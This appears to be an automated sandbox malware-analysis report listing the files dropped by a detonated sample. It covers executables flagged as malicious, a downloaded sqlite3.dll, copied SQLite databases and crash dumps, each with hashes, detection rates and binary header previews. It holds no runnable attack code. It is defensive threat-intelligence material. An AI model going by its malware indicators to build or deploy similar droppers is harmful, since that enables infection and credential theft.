Entropy (8bit):	0.8203105875143651
Encrypted:	false
SSDEEP:	96:wORFQ+hQ2HLvBSwOQoH7R3V6tpXIQcQAc6ccEqcw3dOm+HbHg/8BRTf3o8Fa9iVj:36uQIb68HOYQcjJ5/u7sJS274ItLD
MD5:	3A08F56FDA4B00D25EFDF40A002BDBA5
SHA1:	5C164763F1BF624D0C884020E7F3D6D968E04801
SHA-256:	F329E9E4E622FA88A9132A23E2B163E7B2AFF9263AA5F3DD7543BF2B38C99CD4
SHA-512:	67EB18BEC746DB36CFEB77B00CAEC1F575F0D7B7ED18F4F25E74B41CE6C045B84101839AD3427DBFB52AC87E5FC64F86859236A2A1355FDDE9126B0137688732
Malicious:	false
Reputation:	unknown
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.2.8.2.8.2.0.0.5.9.1.4.8.8.4.9.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.8.2.8.2.0.0.8.8.0.0.8.0.9.3.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.1.7.1.3.a.2.a.-.1.e.0.8.-.4.4.5.9.-.8.2.f.9.-.9.4.6.a.1.c.e.c.e.a.3.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.1.d.2.9.e.2.5.-.d.2.3.f.-.4.9.9.f.-.a.e.3.4.-.5.1.9.d.3.e.4.6.6.d.7.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.3.6.1.B...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.d.4.-.0.0.0.1.-.0.0.1.b.-.5.5.c.f.-.d.6.6.8.8.b.e.6.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.c.1.4.b.f.1.a.9.e.b.5.7.0.7.6.f.d.6.b.a.2.d.3.4.3.4.f.4.9.e.2.0.0.0.0.2.4.0.1.!.0.0.0.0.b.2.1.8.7.d.e.b.c.6.f.d.e.9.6.e.0.8.d.5.0.1.4.c.e.4.f.1.a.f.5.c.f.5.6.8.b.c.e.5.!.3.6.1.B...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.1././.1.1././.1.2.:.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER45FC.tmp.dmp Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Wed Dec 1 08:14:25 2021, 0x1205a4 type
Category:	dropped
Size (bytes):	35056
Entropy (8bit):	2.061410195700154
Encrypted:	false
SSDEEP:	192:uJk1TOY4fOepbDaQpwSKm7CfZ/XA3M1XDOCTSuf5DC:OO7eqneYOCJC
MD5:	9038319473942DCD711778A10626FC50
SHA1:	5F33601FF0509EE93FB7C46B281FADF707C528B0
SHA-256:	A5FA12BF838B7560B25DAD524CEF4E215AF1398D294351CB8C5479660449860F
SHA-512:	F683A39A83BB677E4E326AE5FA0C18F9B14BC6861003F695EDD0C761A392297E551FC7C13CA7C5C72B46EE8406F227870CE81AFD79240124D2993DB20B7D0AC9
Malicious:	false
Reputation:	unknown
Preview:	MDMP....... ..........a.........................................&..........T.......8...........T...............@t...........................................................................................U...........B......8.......GenuineIntelW...........T..............a.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6349.tmp.WERInternalMetadata.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8412
Entropy (8bit):	3.7024230834336134
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNiMq6nh4H6YrJSUigmfpRS8+pD+89b5hsfbVzm:RrlsNip6e6YVSUigmfpRSv5afI
MD5:	7205FC26FDCA75BC92BF3BA091955572
SHA1:	67C5B807CB80956C6F03CD41F0EE58D6C0D215F2
SHA-256:	8C627E610338E4252D18FDC59E23E1BCA7297BB75755B5CF71BF9956F30ADA68
SHA-512:	1C93DBC0A3655579F9267F6A5FE2E7D3B7AC6E2A36E6C0ACEDF55DE6E314402928F97EF5C74630F300233320EDFB9FDF76818D22FA9B8C94F61BDBEC11A020DB
Malicious:	false
Reputation:	unknown
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.6.1.2.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6FFC.tmp.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4685
Entropy (8bit):	4.480084479382914
Encrypted:	false
SSDEEP:	48:cvIwSD8zsGJgtWI91JWSC8Bho8fm8M4Jh8sFu+q8vu8w5M+b2d:uITfca4SNnFJaK43b2d
MD5:	33E08F34DAAE61B397638152C397B679
SHA1:	65FB8177893255C4570FC23D9E014862220B8B06
SHA-256:	28CE57EFBD3827BFCCE58FE71A64986BB344470D94932BA47FC8F1F5E0617D1E
SHA-512:	C732B79439EFDF62F84FD82AA73D03DD384172C456F9C91D591994EA7FEB51BBCA86EFB126AD4F18EEF3BE2F6C96E903E7D7FF98B87720973DA51BE7A09BB6C1
Malicious:	false
Reputation:	unknown
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1278325" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\ProgramData\sqlite3.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\44A2.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	645592
Entropy (8bit):	6.50414583238337
Encrypted:	false
SSDEEP:	12288:i0zrcH2F3OfwjtWvuFEmhx0Cj37670jwX+E7tFKm0qTYh:iJUOfwh8u9hx0D70NE7tFTYh
MD5:	E477A96C8F2B18D6B5C27BDE49C990BF
SHA1:	E980C9BF41330D1E5BD04556DB4646A0210F7409
SHA-256:	16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
SHA-512:	335A86268E7C0E568B1C30981EC644E6CD332E66F96D2551B58A82515316693C1859D87B4F4B7310CF1AC386CEE671580FDD999C3BCB23ACF2C2282C01C8798C
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 3%, Browse Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....=S.v..?......!................X..............`......................... ......8......... .................................L................................'......................................................p............................text...............................`.0`.data...............................@.@..rdata..$...........................@.@@.bss..................................@..edata..............................@.0@.idata..L...........................@.0..CRT................................@.0..tls.... ...........................@.0..reloc...'.......(..................@.0B/4......`....0......................@.@B/19..........@......................@..B/35.....M....P......................@..B/51.....`C...`...D..................@..B/63..................8..............@..B/77..................F..............@..B/89..................R..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\1EAA.exe.log Download File
Process:	C:\Users\user\AppData\Local\Temp\1EAA.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	700
Entropy (8bit):	5.346524082657112
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPk21OKbbDLI4MWuPJKiUrRZ9I0ZKhat/DLI4M/DLI4M0kvoDLIw:ML9E4Ks2wKDE4KhK3VZ9pKhgLE4qE4jv
MD5:	65CF801545098D915A06D8318D296A01
SHA1:	456149D5142C75C4CF74D4A11FF400F68315EBD0
SHA-256:	32E502D76DBE4F89AEE586A740F8D1CBC112AA4A14D43B9914C785550CCA130F
SHA-512:	4D1FF469B62EB5C917053418745CCE4280052BAEF9371CAFA5DA13140A16A7DE949DD1581395FF838A790FFEBF85C6FC969A93CC5FF2EEAB8C6C4A9B4F1D552D
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..2,"Microsoft.CSharp, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Dynamic, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\2340.exe.log Download File
Process:	C:\Users\user\AppData\Local\Temp\2340.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1192
Entropy (8bit):	5.359562127686337
Encrypted:	false
SSDEEP:	24:ML9E4Ks2wKDE4KhK3VZ9pKhuE4KaE4q0E4KiZhnRAE4Kzr7r1qE4UE4Ks:MxHKXwYHKhQnouHKaHxHKipAHKzvr1qq
MD5:	26BF5ED58FB6D9EEDD639F036FC882FE
SHA1:	21C3BFFF881964A836C3489507EAF36CD4BA652D
SHA-256:	2998ED6B8D1EB85DE8BEE772CEF62D57ED40224EECFE4349C3275F0C7AA96542
SHA-512:	F7B54F1EFC414567AD547823B8A178F562309507F91FF54EE3FDABF4D5AC8B3E9450E2A261D3CD6A34430E2ADF1D3354A82EA1E58A7362A207EA659304B80428
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..2,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Xml.Linq, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml.Linq\f54e3a73bfefb71eb6e1de09129af7f0\System.Xml.Linq.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\sqlite3[1].dll Download File
Process:	C:\Users\user\AppData\Local\Temp\44A2.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	645592
Entropy (8bit):	6.50414583238337
Encrypted:	false
SSDEEP:	12288:i0zrcH2F3OfwjtWvuFEmhx0Cj37670jwX+E7tFKm0qTYh:iJUOfwh8u9hx0D70NE7tFTYh
MD5:	E477A96C8F2B18D6B5C27BDE49C990BF
SHA1:	E980C9BF41330D1E5BD04556DB4646A0210F7409
SHA-256:	16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
SHA-512:	335A86268E7C0E568B1C30981EC644E6CD332E66F96D2551B58A82515316693C1859D87B4F4B7310CF1AC386CEE671580FDD999C3BCB23ACF2C2282C01C8798C
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 3%, Browse Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....=S.v..?......!................X..............`......................... ......8......... .................................L................................'......................................................p............................text...............................`.0`.data...............................@.@..rdata..$...........................@.@@.bss..................................@..edata..............................@.0@.idata..L...........................@.0..CRT................................@.0..tls.... ...........................@.0..reloc...'.......(..................@.0B/4......`....0......................@.@B/19..........@......................@..B/35.....M....P......................@..B/51.....`C...`...D..................@..B/63..................8..............@..B/77..................F..............@..B/89..................R..

C:\Users\user\AppData\Local\Temp\12F1.exe Download File
Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1285856
Entropy (8bit):	7.290553475161652
Encrypted:	false
SSDEEP:	24576:wAvkNkBobrsLgjMTarTbEzqFyyLGPaz8sMRK7wD9x3TOs7:n80iTjMTaf7iPaWRiwDf3TX
MD5:	31F17AD58D02772DF14EFAC37D416CD7
SHA1:	BC8EA09D50B5B794AF6C741B0C2D39C637831913
SHA-256:	21F7623006B248709A14CBFC507187FD44A8ADA2D0DD465FAA79317ECE02DC78
SHA-512:	7B3E94C7D808CF779704D33893D7B8EE9F56E445BE554B18A1F7476016AB68D2463F78A1278B1DAA6F8D4DD26535E1A50DA8A33412428E977D0659B8388B56DE
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Metadefender, Detection: 26%, Browse Antivirus: ReversingLabs, Detection: 57%
Reputation:	unknown
Preview:	MZ.....o...g.'.:.( =.&../..`.O....O[.E..vi\|.DC..[A...........Q..............................................................................................................................................................................................PE..L....x................0......r........... ...@....@.................................\.....@..................................P.......`..Xo...................................................................................................................@.............................`.............P......................@....rsrc...Xo...`..Xo..................@..@.........@.......(...v..............@.....................................................................................................................................................................................................................................................................................................................+.........../.\.;3)x)n...s.

C:\Users\user\AppData\Local\Temp\1EAA.exe Download File
Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	397824
Entropy (8bit):	3.7269481746723154
Encrypted:	false
SSDEEP:	12288:aE8ijGrr1Lj3crjEn2dLkbi2dX4Q4qQO8:UiT3
MD5:	5115E5DAB211559A85CD0154E8100F53
SHA1:	347800B72AC53EC6E2C87E433763B20282A2C06D
SHA-256:	EF156FB3A203FE197D89D63E2EA7805A1B9AF505DFFF5A58532DBFE34E7AABAA
SHA-512:	D03E58376BE1E299A6DA57A28ED5DB176999BADED713AA54DDB59CF8C82B97E8C0B028CE07BDDB6989C7C77E518E151E112DDE2F1D5244AC2572E4371FA68C12
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Metadefender, Detection: 37%, Browse Antivirus: ReversingLabs, Detection: 79%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...(.q...............0..............(... ...@....@.. ....................................@..................................(..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................(......H......../..\............................................................0..........~....u....s....z&......................2(.... ....j....r...p(.....s....%.}..........s....o....9....s....z....(.........2.s....(.......v.(......r...p~....o....(........{.....0..i........:....~........(......~....:$.........(.........(....(....(.........~....{....~.....o....(....o....}........0...........o......o....(.....(.....o.....6..(....(....*...0..E.......~.....s.......8"........

C:\Users\user\AppData\Local\Temp\2340.exe Download File
Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	modified
Size (bytes):	1143000
Entropy (8bit):	7.2472305489572335
Encrypted:	false
SSDEEP:	12288:N6e6+O/RK8MmtDX5f11XNbW/kjvULGaPBUcXTE/RFia0/1AtBVEOi2vU86N1A:kHc8L59HbViGaJUck1iAtBVEN2vX6zA
MD5:	97617914D6E8A6E3CBEE8A5E5FF39AA5
SHA1:	CAF7FEF0EFD3DBCF176C7CFC85CC545DD0DC9EFD
SHA-256:	7C1C287F9CE0D8D90C95851781FF2732780177F6C1AFFECC9EED376436981112
SHA-512:	F4C79F9E41124044AA1D0A44E86D0A184BEDA33163D7B0973DC23B4FF5087C708175BD89F73FFC2C160A66BF23F09835C422B654353DC67CB59EA053CF60EABB
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 27%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...p.i...............0..`...........~... ........@.. ...............................5....@.................................P~..K....................h............................................................... ............... ..H............text....^... ...`.................. ..`.rsrc................b..............@....reloc...............f..............@..B.................~......H............_...........w......}......................................B(....~S...(........0.............B(....~S...(..............B(....~S...(......................0..............0..............0.............B(....~S...(.............................0.............B(....~S...(...............0..............0..............0..............0.............B(....~S...(........0..............0.............B(....~S...(........0..............0.............*.0..

C:\Users\user\AppData\Local\Temp\26XBS2DT Download File
Process:	C:\Users\user\AppData\Local\Temp\44A2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	118784
Entropy (8bit):	0.45897271081743474
Encrypted:	false
SSDEEP:	96:/8WU+bDoYysX0uhnydVjN9DLjGQLBE3u:El+bDo3irhnydVj3XBBE3u
MD5:	48A0503A55113CE8C8D7A1481A465D49
SHA1:	6212FF680FA492983973EEF5341BDD2AC5B28417
SHA-256:	E79639510991FEBA97C39F0388B53420765D307C46C43B0BD0C014FD36EF8092
SHA-512:	96A2FC52E2325A29F4B38A080DA817DA741A38BB8DBFD2A85349608251197D3D715A75639FB587216C5BAF8034A93F33E11DA7E35C70347BF584DAC94EF889CF
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\305.exe Download File
Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2740224
Entropy (8bit):	7.959483373293049
Encrypted:	false
SSDEEP:	49152:MChUuz9ubrD0rNoVNsLdq0MTq24FdizzlzKGg6W6SYjUN+dCo:vUuxGD0iVNsL9cqtdi8GE6hA+3
MD5:	CA16CA4AA9CF9777274447C9F4BA222E
SHA1:	1025ED93E5F44D51B96F1A788764CC4487EE477E
SHA-256:	0016755526279C5C404B670ECB2D81AF46066D879C389924A6574AB9864B5C04
SHA-512:	72D8D2A729B8CE2940235D3A317EE3EB0EB8D1411E847D6D11E36484F520BB88B3CABD03716B3C2988B0A053426BE14AACE154F13D306883788F952CD03CF712
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Metadefender, Detection: 43%, Browse Antivirus: ReversingLabs, Detection: 86%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........LC.y.C.y.C.y.W.z.H.y.W.\|..y.W.}.Q.y.W.~.B.y...}.R.y...z.V.y...\|.i.y.W.x.P.y.C.x..y...p.D.y....B.y...{.B.y.RichC.y.........................PE..L...w7.a.................@...........RF......P....@.......................... n......*...@......................................................................................................................................................... .>.......................... ..` .....P...P..................@..@ $....0......................@... .....P......................@..@ ."...`......................@..B.idata..............................@....rsrc...............................@..@.themida..A.........................`....boot.....'..PF...'.................`..`........................................................................................................................

C:\Users\user\AppData\Local\Temp\361B.exe Download File
Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	163328
Entropy (8bit):	6.266388012405613
Encrypted:	false
SSDEEP:	3072:qkqeuZi3xqvmqEzkC34ygPsAXtITmUYasQ2:VXuk3EvmqEgS4jlLay
MD5:	DF13FAC0D8B182E4D8B9A02BA87A9571
SHA1:	B2187DEBC6FDE96E08D5014CE4F1AF5CF568BCE5
SHA-256:	AF64F5B2B6C4CC63B0CA4BB48F369EBA1629886D85E289A469A5C9612C4A5EE3
SHA-512:	BC842A80509BDA8AFFF6E12F5B5C64CCF7F1D7360F99F63CEBBC1F21936A15487EC16BDE3C2ACFF22C49EBCEDF5C426621D6F69503F4968AACC8E75611E3A816
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Metadefender, Detection: 29%, Browse Antivirus: ReversingLabs, Detection: 51%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...............................................................................................................PE..L...S.._.................B....t......*.......`....@..........................@v.....x[......................................D...x.....u..............................a.................................@............`..d............................text...P@.......B.................. ..`.rdata..~....`.......F..............@..@.data...`us.........................@....fefeg..r.....u.....................@..@.guyus..p.....u.....................@..`.venu.........u.....................@..`.rsrc.........u.....................@..@................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\44A2.exe Download File
Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	351744
Entropy (8bit):	6.213948226707096
Encrypted:	false
SSDEEP:	6144:nXKjkwFMx3dfUVxmFBGG8wScyH31in9HRPnWDe9XvA6OcnLmKo/38+ehh:n69Fc3dl8wScyH31in9HRPnUe9/ASnL4
MD5:	45D0A6BB2CA00643FB04BF15D4AAA2C9
SHA1:	BA7EF4495BFDD4D4A89A61CD9961715618EFB768
SHA-256:	D1F548773AEDAFB4836901DA6C0D6580FA4D836E46665E9E844915BB85D4E3E0
SHA-512:	1688DDB5683FA104CB9FC4EC6DE9E402190F856BDEA9D4BD7CD64F5344F5A0527E77C56FDAD8D32C80F25025DA3F3E6F75829B390AE58B1C82970F76759285BC
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........OW...9P..9P..9Ph`.P..9P.X.P..9P.X.P..9P.X.Py.9P.V.P..9P..8P..9P.X.P..9P.X.P..9P.X.P..9PRich..9P................PE..L..._.j`.....................@......0.............@..........................p......Q;..........................................(.......pA...................0..8.......................................@...............l............................text............................... ..`.data...@...........................@....rsrc...pA.......B..................@..@.reloc...;...0...<..."..............@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\51B3.exe Download File
Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	336896
Entropy (8bit):	6.093303347227195
Encrypted:	false
SSDEEP:	6144:Lz1DqgKqQBllS35U3jiXtHgL7Xw6KXUY3j0flQi1ejhH:5BVWllS35U3jiXtHgL7g6KEYQflQi1
MD5:	D2331EDF10B3C0E6A5C8FEC0A1A6392E
SHA1:	F988ADDBBF47CF6DD3AC9C83BAA1ACED7309EFF1
SHA-256:	BB19A312C32F06DC9748BF7317F066A9EC2AECD4B09456A03C097D4118F0ECF9
SHA-512:	BF326F98DD84E1B0BAA695CE0E26A52569EFD1B6AF13430568F52277572A42205232B0436CB966E665611A89F8F25564B8B8F5F652FE45A95BE20688CC7C8F1A
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........OW...9P..9P..9Ph`.P..9P.X.P..9P.X.P..9P.X.Py.9P.V.P..9P..8P..9P.X.P..9P.X.P..9P.X.P..9PRich..9P................PE..L.....}_.....................@...................@..........................@......8q.........................................(.......pA......................4...................................h...@...............l............................text...n........................... ..`.data...@...........................@....rsrc...pA.......B..................@..@.reloc...;.......<..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\6829558ede\tkools.exe Download File
Process:	C:\Users\user\AppData\Local\Temp\2340.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1143000
Entropy (8bit):	7.2472305489572335
Encrypted:	false
SSDEEP:	12288:N6e6+O/RK8MmtDX5f11XNbW/kjvULGaPBUcXTE/RFia0/1AtBVEOi2vU86N1A:kHc8L59HbViGaJUck1iAtBVEN2vX6zA
MD5:	97617914D6E8A6E3CBEE8A5E5FF39AA5
SHA1:	CAF7FEF0EFD3DBCF176C7CFC85CC545DD0DC9EFD
SHA-256:	7C1C287F9CE0D8D90C95851781FF2732780177F6C1AFFECC9EED376436981112
SHA-512:	F4C79F9E41124044AA1D0A44E86D0A184BEDA33163D7B0973DC23B4FF5087C708175BD89F73FFC2C160A66BF23F09835C422B654353DC67CB59EA053CF60EABB
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...p.i...............0..`...........~... ........@.. ...............................5....@.................................P~..K....................h............................................................... ............... ..H............text....^... ...`.................. ..`.rsrc................b..............@....reloc...............f..............@..B.................~......H............_...........w......}......................................B(....~S...(........0.............B(....~S...(..............B(....~S...(......................0..............0..............0.............B(....~S...(.............................0.............B(....~S...(...............0..............0..............0..............0.............B(....~S...(........0..............0.............B(....~S...(........0..............0.............*.0..

C:\Users\user\AppData\Local\Temp\ASRIWLNY Download File
Process:	C:\Users\user\AppData\Local\Temp\44A2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\E3E3OPZU Download File
Process:	C:\Users\user\AppData\Local\Temp\44A2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.792852251086831
Encrypted:	false
SSDEEP:	48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
MD5:	81DB1710BB13DA3343FC0DF9F00BE49F
SHA1:	9B1F17E936D28684FFDFA962340C8872512270BB
SHA-256:	9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
